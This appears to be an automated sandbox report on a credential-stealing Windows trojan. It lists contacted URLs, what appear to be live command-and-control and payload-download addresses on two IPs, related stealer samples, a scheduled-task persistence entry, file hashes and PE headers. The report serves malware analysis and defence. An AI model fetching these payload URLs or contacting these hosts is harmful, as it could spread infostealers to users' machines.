http://timgolden.me.uk/python/wmi.htmlstr	0%	Avira URL Cloud	safe
https://fluid-draw.sourceforge.io/rsn.exe	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpF	100%	Avira URL Cloud	malware
http://www.faqs.org/rfcs/rfc822.html	0%	Avira URL Cloud	safe
https://fluid-draw.sourceforge.io/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sexo.gofile.fun	104.21.80.1	true	false		unknown
fluid-draw.sourceforge.io	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.43/Zu7JuNko/index.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://google.com/	rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://.../back.jpeg	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fluid-draw.sourceforge.io/rsn.exe	skotes.exe, 00000006.00000002.3347261367.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.3155116868.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3347261367.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud.google.com/appuser/docs/standard/runtimes	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.python.org/	rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mhammond/pywin32	pythoncom27.dll.8.dr	false		high
https://httpbin.org/post	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fluid-draw.sourceforge.io/rsn.exe8012	skotes.exe, 00000006.00000002.3347261367.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pyca/cryptography/	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpE	skotes.exe, 00000006.00000002.3347261367.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	false		high
http://timgolden.me.uk/python/wmi.htmlstr	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpF	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/urllib3/urllib3/issues/497	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpG	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpnu	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/files/5979055508/wfhVWWv.exeXYZ0123456789	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pyca/cryptography/actions?query=workflow%3ACI	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.apache.org/licenses/LICENSE-2.0	wfhVWWv.exe, 00000027.00000003.3335012171.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3335104515.0000012BC3FF2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183334442.0000000002546000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp, rsn.exe, 00000009.00000002.3351057819.000000006C452000.00000002.00000001.01000000.0000000C.sdmp	false		high
http://31.41.244.11/files/5979055508/wfhVWWv.exes$	skotes.exe, 00000006.00000002.3347261367.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://yahoo.com/	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.opensource.org/licenses/mit-license.php	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344182123.0000000003077000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.faqs.org/rfcs/rfc2822.html	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://w3c.github.io/html/sec-forms.html#multipart-form-data	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.unicode.org/reports/tr44/tr44-4.html).	rsn.exe, 00000008.00000003.3189558331.00000000024ED000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349917189.000000006C1E8000.00000004.00000001.01000000.00000016.sdmp	false		high
https://cryptography.io/en/latest/changelog/	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fluid-draw.sourceforge.io/m	skotes.exe, 00000006.00000002.3347261367.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mail.python.org/mailman/listinfo/cryptography-dev	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php32	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/files/5979055508/wfhVWWv.exe	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://requests.readthedocs.io	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curl.haxx.se/rfc/cookie_spec.html	rsn.exe, 00000009.00000002.3344900049.00000000037B4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.python.org/dev/peps/pep-0205/	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/5979055508/wfhVWWv.exeMa	skotes.exe, 00000006.00000002.3351360093.0000000005850000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://json.org	rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://python.org/dev/peps/pep-0263/	rsn.exe, 00000009.00000002.3351615382.000000006C6AA000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://httpbin.org/get	rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://httpbin.org/	rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.digi	wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/1850	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.apache.org/licenses/	wfhVWWv.exe, 00000027.00000003.3335012171.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/dev/peps/pep-0205/	wfhVWWv.exe, 00000027.00000003.3332933430.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/	rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/5979055508/wfhVWWv.exeD	skotes.exe, 00000006.00000002.3347261367.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/en/latest/installation/	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/59	skotes.exe, 00000006.00000002.3347261367.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.shields.io/pypi/v/cryptography.svg	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/mail/	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpy	skotes.exe, 00000006.00000002.3347261367.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.catcert.net/verarrel	rsn.exe, 00000008.00000003.3190942670.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wwwsearch.sf.net/):	rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	false		high
ftp://http://HTTP/1.0	rsn.exe, 00000008.00000003.3184869887.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3184337790.000000000251A000.00000004.00000020.00020000.00000000.sdmp, mfc90u.dll.8.dr	false	Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.htmlC:	rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183334442.0000000002546000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp, rsn.exe, 00000009.00000002.3351057819.000000006C452000.00000002.00000001.01000000.0000000C.sdmp	false		high
https://cryptography.io/en/latest/security/	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://timgolden.me.uk/python/wmi.html	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.faqs.org/rfcs/rfc822.html	rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cryptography.io	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fluid-draw.sourceforge.io/	skotes.exe, 00000006.00000002.3347261367.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pyca/cryptography/issues	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://readthedocs.org/projects/cryptography/badge/?version=latest	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/mail	rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pypi.org/project/cryptography/	wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true
31.41.244.11	unknown	Russian Federation		61974	AEROEXPRESS-ASRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583668
Start date and time:	2025-01-03 09:49:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Fi3ptS6O8D.exe renamed because original name is a hash value
Original Sample Name:	5d64b7ceda882bda0e8c8384f2edb0668d84b6ddd79ca5d75ca280f761a7cbde.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@59/1012@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 104.18.10.31, 104.18.11.31, 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): prwebsecure.sourceforge.io.cdn.cloudflare.net, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:51:00	API Interceptor	1037x Sleep call for process: skotes.exe modified
09:49:58	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	LIWYEYWSOj.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	Idau8QuYa3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	oTZfvSwHTq.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
31.41.244.11	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	31.41.244.11/files/fate/random.exe
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	31.41.244.11/files/kardanvalov88/random.exe
	Idau8QuYa3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	31.41.244.11/files/zipcryptservice/random.exe
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	31.41.244.11/files/fate/random.exe
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	31.41.244.11/files/client.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	31.41.244.11/files/unique2/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	31.41.244.11/files/martin/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	31.41.244.11/files/karl/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	31.41.244.11/files/karl/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	31.41.244.11/files/unique2/random.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AEROEXPRESS-ASRU	random(4).exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	31.41.244.11
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	31.41.244.11
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse	31.41.244.11
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	31.41.244.11
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	31.41.244.11
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	31.41.244.11
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	31.41.244.11
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	31.41.244.11
	Idau8QuYa3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	31.41.244.11
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse	31.41.244.11
WHOLESALECONNECTIONSNL	random(4).exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	random(6).exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse	185.215.113.206
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.16
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\rsn[1].exe	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse
C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse
C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	50265898
Entropy (8bit):	7.999674698414995
Encrypted:	true
SSDEEP:	786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
MD5:	26F7294CA7A10C65B44057525A233636
SHA1:	59A5C0438745C24350DFF1D05726D85B2F5DB394
SHA-256:	57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
SHA-512:	C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Joe Sandbox View:	Filename: EdYEXasNiR.exe, Detection: malicious, Browse Filename: 5EfYBe3nch.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..................\|............@..........................@............@.....................................d........]................... .........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc....].......^..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	598064
Entropy (8bit):	6.504706526380269
Encrypted:	false
SSDEEP:	12288:LiGn9go3BzQAq/ems1ku07m+ePwrwo+9Ct6:LiGn9go2Aq/bsUvKno+9CY
MD5:	A7742C996FFDA7754142730220432485
SHA1:	3401BECB24617F98C18B9176D12220F4D7C945C9
SHA-256:	C915CDD250FF25970BA041A5DADFC93E8AE9629C6415B88A92718F1EAE9E9666
SHA-512:	461935115A59ACCE074A686F3DEADBBF02A92844A57F55E20A532C77AA788B116A930A2F6100758ABD9BB3919AD15C18D498DCEAEE341CBCDDB98BB3922C7FAA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.s...s...s..j.G..s..j.E.]s..j.D..s..@.q..s...-...s...-...s...-...s....%..s...s..ps..I-...s..L-I..s..I-...s..Rich.s..................PE..L...}~.^.........."...... ...................0....@..................................%....@.................................<...x.......................00......H9..P...T...............................@............0...............................text...?........ .................. ..`.rdata.......0.......$..............@..@.data............*..................@....tls................................@....rsrc...............................@..@.reloc..H9.......:..................@..B........................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\Fi3ptS6O8D.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3237376
Entropy (8bit):	6.686536666157911
Encrypted:	false
SSDEEP:	24576:HsTrFLIsP1z3MnTblzQt/2LzE3Fe6CHrUgxEnKz1OyuaFy0idLsG3f1gp7dLwKTR:HsTiW14T3E7WxErzqpKGu/zorjIAg
MD5:	37083B063FB068C71CC025F842D985A1
SHA1:	47480FAA3A194905F0D5CCD8E0DBE7F50E1884B8
SHA-256:	5D64B7CEDA882BDA0E8C8384F2EDB0668D84B6DDD79CA5D75CA280F761A7CBDE
SHA-512:	E74C780123AFDECE31831BEF687BBB3C809AC5406F500341CE3C65F1EBC8263424729CF3499EEA773492C1B6E3B389D3292B3DE0184720892C7A5508C676856E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................p1...........@...........................1.......1...@.................................W...k............................P1.............................\P1..................................................... . ............................@....rsrc...............................@....idata ............................@...qplxvkoi..........................@...cuoxomvg.....`1......>1.............@....taggant.0...p1.."...D1.............@...........................................................................................................................................................................................................................................................

Entrypoint:	0x717000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3150ac	0x10	qplxvkoi
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31505c	0x18	qplxvkoi
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
